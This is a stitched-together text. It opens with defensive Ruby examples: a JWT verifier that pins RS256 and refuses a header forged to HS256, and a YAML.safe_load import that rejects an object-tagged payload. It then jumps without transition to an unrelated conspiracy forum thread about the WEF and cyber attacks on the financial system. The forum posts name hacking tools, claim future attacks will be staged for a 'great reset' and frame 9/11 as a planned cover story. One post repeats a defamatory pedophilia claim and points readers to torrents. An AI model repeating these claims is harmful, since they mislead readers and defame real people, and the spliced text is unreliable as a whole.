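# signature algorithm to RS256 and verifies with an RSA public key only. The
# algorithm comes from our own configuration, never from the token header, so a
# token whose header says HS256 (or none) is refused before any cryptography runs.
module PinnedJwt
  ALLOWED_ALG = 'RS256'.freeze

  class InvalidToken < StandardError; end

  def self.b64url_decode(str)
    Base64.urlsafe_decode64(str)
  rescue ArgumentError
    raise InvalidToken, 'malformed base64url segment'
  end

  def self.b64url_encode(bytes)
    Base64.urlsafe_encode64(bytes, padding: false)
  end

  def self.parse_json(segment)
    JSON.parse(b64url_decode(segment))
  rescue JSON::ParserError
    raise InvalidToken, 'segment is not valid JSON'
  end

  # Verify a compact JWS token with an OpenSSL::PKey::RSA public key and return
  # the payload as a Hash. Raises InvalidToken on any defect.
  def self.decode(token, public_key)
    parts = token.to_s.split('.', -1)
    raise InvalidToken, 'token must have exactly three segments' unless parts.length == 3
    header_b64, payload_b64, sig_b64 = parts

    header = parse_json(header_b64)
    # The header is untrusted input: it may only confirm the pinned algorithm.
    unless header['alg'] == ALLOWED_ALG
      raise InvalidToken, "unexpected alg #{header['alg'].inspect}, only #{ALLOWED_ALG} is accepted"
    end

    signing_input = "#{header_b64}.#{payload_b64}"
    signature = b64url_decode(sig_b64)
    valid = begin
      public_key.verify(OpenSSL::Digest.new('SHA256'), signature, signing_input)
    rescue OpenSSL::PKey::PKeyError
      false # e.g. a signature of the wrong length for this key
    end
    raise InvalidToken, 'signature verification failed' unless valid

    payload = parse_json(payload_b64)
    raise InvalidToken, 'token expired' if payload['exp'] && Time.now.to_i >= payload['exp']
    payload
  end

  # Issue an RS256 token with the matching private key (the server's login path).
  def self.encode(payload, private_key)
    header_b64 = b64url_encode(JSON.generate('alg' => ALLOWED_ALG, 'typ' => 'JWT'))
    payload_b64 = b64url_encode(JSON.generate(payload))
    signing_input = "#{header_b64}.#{payload_b64}"
    signature = private_key.sign(OpenSSL::Digest.new('SHA256'), signing_input)
    "#{signing_input}.#{b64url_encode(signature)}"
  end

  # Return a copy of the token whose header claims a different alg, with the
  # other two segments untouched; used only to show that decode refuses it.
  def self.with_header_alg(token, alg)
    header_b64, payload_b64, sig_b64 = token.split('.', -1)
    header = parse_json(header_b64).merge('alg' => alg)
    "#{b64url_encode(JSON.generate(header))}.#{payload_b64}.#{sig_b64}"
  end
end

if __FILE__ == $PROGRAM_NAME
  demo_key = OpenSSL::PKey::RSA.new(2048) # constructed key pair for the demo
  demo_token = PinnedJwt.encode({ 'user_id' => 42 }, demo_key)
  p PinnedJwt.decode(demo_token, demo_key.public_key)
  begin
    PinnedJwt.decode(PinnedJwt.with_header_alg(demo_token, 'HS256'), demo_key.public_key)
  rescue PinnedJwt::InvalidToken => e
    puts "rejected: #{e.message}"
  end
end
```

    The design point is that the verifier never asks the token which algorithm to use. In the vulnerable decode above, the alg field chose between RSA and HMAC and, for HMAC, the PEM text of the public key became the shared secret; here the only decision the header can influence is whether the token is rejected outright.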

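    Editor's added example for the YAML insecure deserialisation section of the article above. It is not code from the article or from the game service; it is a stand-alone rewrite of the import path around YAML.safe_load that can be run offline, with the module name PetitionImport, the [status, body] return shape and the 400/422 status codes as my own assumptions (the original controller answered 500). It also covers a caveat the article's one-line fix leaves out: safe_load only admits the core YAML types, so an unquoted created_at such as 2021-04-07 raises Psych::DisallowedClass unless Date and Time are listed in permitted_classes.

```ruby
require 'base64'
require 'date'
require 'yaml'

# Added example, not the game service's code: the petition import rebuilt around
# YAML.safe_load. Only plain mappings, sequences and scalars are accepted; aliases
# stay enabled because the checker relies on them; Date and Time are permitted so
# an unquoted created_at still parses (safe_load rejects them otherwise).
module PetitionImport
  PERMITTED_CLASSES = [Date, Time].freeze

  # Decode and validate a base64-encoded YAML petition.
  # Returns [http_status, body], shaped like the controller's json_response.
  def self.import(base64_petition)
    yaml = Base64.decode64(base64_petition.to_s)
    petition = YAML.safe_load(yaml, permitted_classes: PERMITTED_CLASSES, aliases: true)

    # Type-check what came back: a string or list is not a petition.
    unless petition.is_a?(Hash) && petition['title'].is_a?(String) && petition['text'].is_a?(String)
      return [422, { 'message' => 'petition must be a mapping with string title and text' }]
    end

    record = { 'title' => petition['title'], 'text' => petition['text'] }
    record['created_at'] = petition['created_at'] if petition['created_at']
    [200, record]
  rescue Psych::DisallowedClass => e
    # Any !ruby/object:... tag (the deserialisation gadget) ends up here; the
    # tagged class is named in the message but never instantiated.
    [400, { 'message' => "rejected: #{e.message}" }]
  rescue Psych::SyntaxError => e
    [400, { 'message' => e.message }]
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs for the demo (not captured traffic).
  benign = Base64.strict_encode64("title: &t Fix the bridge\ntext: *t\ncreated_at: 2021-04-07\n")
  tagged = Base64.strict_encode64("--- !ruby/object:Object {}\n")
  p PetitionImport.import(benign)
  p PetitionImport.import(tagged)
end
```

    Note that on Ruby 3.1 and later (Psych 4) YAML.load already behaves like safe_load and the old behaviour moved to YAML.unsafe_load, but code written against older Psych, like the game service's, still needs the explicit safe_load call and its permitted_classes list.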
  5. Link to Post #3
    Thailand Avalon Member palehorse's Avatar
    Join Date
    13th April 2020
    Location
    Thailand
    Language
    English
    Age
    43
    Posts
    567
    Thanks
    4,227
    Thanked 3,462 times in 532 posts

    Default Re: WEF planning cyber attack on financial system?

    Well.. I am wondering why they are talking about this again!?! It is not new news that the financial system is weak and may collapse; to be frank I have been hearing this since 2011 or even before that, on many occasions when I was connected to IRC servers. There were anonops channels available elsewhere, with many operations daily, things going from DDoS on large corporations to small ones, hitting servers like KKK, Al-Qaeda, pedo websites like Clinton family, non-profit organizations, universities.. and it didn't stop there: database hacking was the most requested (and still is), using tools like `sqlmap` and `havij` and browser exploitation tools like `beef`, also vuln checks and hacking tools from the amazing `rapid7`. I worked as a programmer and many times close to the penetration test guy (yeah I know, weird name), especially when the company didn't want to pay an extra worker (it was part of my job to watch vulnerabilities and patch them), so I had to learn about this stuff to know what the possible threat could be and be ready to mitigate problems if they arose. I got quite acquainted with many of these tools and I can assure you 100%, maybe 200%, almost the entire web is vulnerable (it is a freak show, everything is tested innumerable times). There are so many flaws, or call them bugs, that the majority are not even documented (some very famous Linux libraries have some major flaws that were never really addressed well, there are band-aid sort of things) and there are no tools to test them (it is a live thing expanding quickly, very dynamic). What you find on exploit-db websites or CVE is just the tip of the iceberg; most real hackers will never disclose a breach of such systems, they will exploit the breach as much as they can, in other words they will milk the cow, leave the dead beef behind and go for the next target. Many times the "security experts" can't detect all the "daemons" in their system, some are very hard to detect and they are stealthy, one really needs to watch closely to find inconsistencies in the files. Remember Stuxnet? The mainstream today call it a "computer program", truth is: it was a hell of a hack, they just have to admit it.

    Most hacks are related to confidential data, and if the hacker doesn't warn the company (or make a joke of it, some love an audience), the exploit can remain in place for a long time until someone finds it; some of these things are really undetectable. Remember you can't test a vulnerability against something that is not yet available, by the way that's how anti-virus/malware companies make their bucks.
    A very skilled hacker is also a master of patience, some hacks take years of planning, testing and execution; on the other hand some hacks are quickly done with an insider, I would not call that hacking, but the media does.

    Now back to the banks, have you heard of the "Beirut Bank Job"? Bangladesh Central Bank hack? SWIFT security breaches? Sonali Bank heist in 2013? In Bangladesh for example the hackers walked away with more than 80 million dollars, the target was 1 billion, but they failed and the FED and CBIAS, which are the same ****, took the blame (they are supposed to protect the smaller economies, which by the way blindly trust them). All these cases were followed by investigations and they found out that bank employees were probably acting as accomplices; they also have strong suspicions about the government of North Korea (Lazarus Group or BeagleBoyz, the FBI claimed to have the name of a North Korean man responsible and he was charged, but never arrested, also their claims have no name, which is very strange) and a ****ing casino in China owned by a Chinese-Filipino; a few bank employees were arrested but there is no solid case and the money was never recovered. In total there were more than 10 bank heists (hacking since 2013), and the companies investigating say almost all have the same patterns of attack.

    Quote from the article: “Not a Question of If but When”. It says everything.

    A little bit off-topic but may interest someone
    This US show was made in 2015 and all the hacking stuff was researched with real hackers (some anonymous) and based on the ongoing world hacking events of the time, because they wanted the most accurate picture of what the hacker world really means; here Mr. Robot brings down the entire economic system with the help of his crew and people.. (the 1% of the 1% that like to play God).

    The Plot
    "Elliot, a brilliant but highly unstable young cyber-security engineer and vigilante hacker, becomes a key figure in a complex game of global dominance when he and his shadowy allies try to take down the corrupt corporation he works for."

    If anyone has the time to watch, it is very informative. https://www.imdb.com/title/tt4158110/?ref_=fn_al_tt_1 (it is available in torrents everywhere).

    Also I would like to recommend these podcasts, very informative with people actively working in this industry >>> https://darknetdiaries.com/

    I would not be surprised if the entire thing is staged, and when the next one occur it will render the entire financial system obsolete, because in fact that's what they want, a great reset.
    Last edited by palehorse; 8th April 2021 at 13:50. Reason: added podcast recommendation
    --
    A chaos to the sense, a Kosmos to the reason.

  6. The Following 6 Users Say Thank You to palehorse For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), O Donna (10th April 2021), TomKat (8th April 2021), toppy (8th April 2021)

  7. Link to Post #4
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    1,821
    Thanks
    1,336
    Thanked 7,816 times in 1,607 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by palehorse (here)
    Well.. I am wondering why they are talking about this again!?!
    They have to set up the cover story ahead of time. Like they did with 9/11. So that, when it happened, "everybody knew" it was Bin Laden.

  8. The Following 7 Users Say Thank You to TomKat For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Miha (11th April 2021), O Donna (10th April 2021), palehorse (8th April 2021), toppy (8th April 2021)

  9. Link to Post #5
    Avalon Member Andre's Avatar
    Join Date
    9th July 2010
    Location
    Byron Bay Area
    Language
    English
    Posts
    405
    Thanks
    302
    Thanked 1,937 times in 374 posts

    Default Re: WEF planning cyber attack on financial system?

    Very interesting post. Thanks TomKat! Will look at this more closely when I have some time.
    Our destiny is in our hands. Let us visualise a world of truth, freedom and equality.

  10. The Following User Says Thank You to Andre For This Post:

    Bill Ryan (11th April 2021)

  11. Link to Post #6
    UK Moderator/Librarian/Administrator Tintin's Avatar
    Join Date
    3rd June 2017
    Location
    Trowbridge/Bath - UK
    Age
    51
    Posts
    3,077
    Thanks
    29,055
    Thanked 21,745 times in 3,047 posts

    Default Re: WEF planning cyber attack on financial system?

    Israel appears to confirm it carried out cyberattack on Iran nuclear facility

    Is this a part of the exercise I wonder
    “If a man does not keep pace with [fall into line with] his companions, perhaps it is because he hears a different drummer. Let him step to the music which he hears, however measured or far away.” - Thoreau

  12. The Following 4 Users Say Thank You to Tintin For This Post:

    Bill Ryan (11th April 2021), gord (11th April 2021), palehorse (12th April 2021), Sunny (14th April 2021)

  13. Link to Post #7
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    1,821
    Thanks
    1,336
    Thanked 7,816 times in 1,607 posts

    Default Re: WEF planning cyber attack on financial system?

    Last night on 60 Minutes, Jerome Powell reiterated that the most concerning threat is a cyber attack on the financial system. They might need to bring down the whole system to bring in the new one.

  14. The Following 2 Users Say Thank You to TomKat For This Post:

    Miha (13th April 2021), palehorse (13th April 2021)
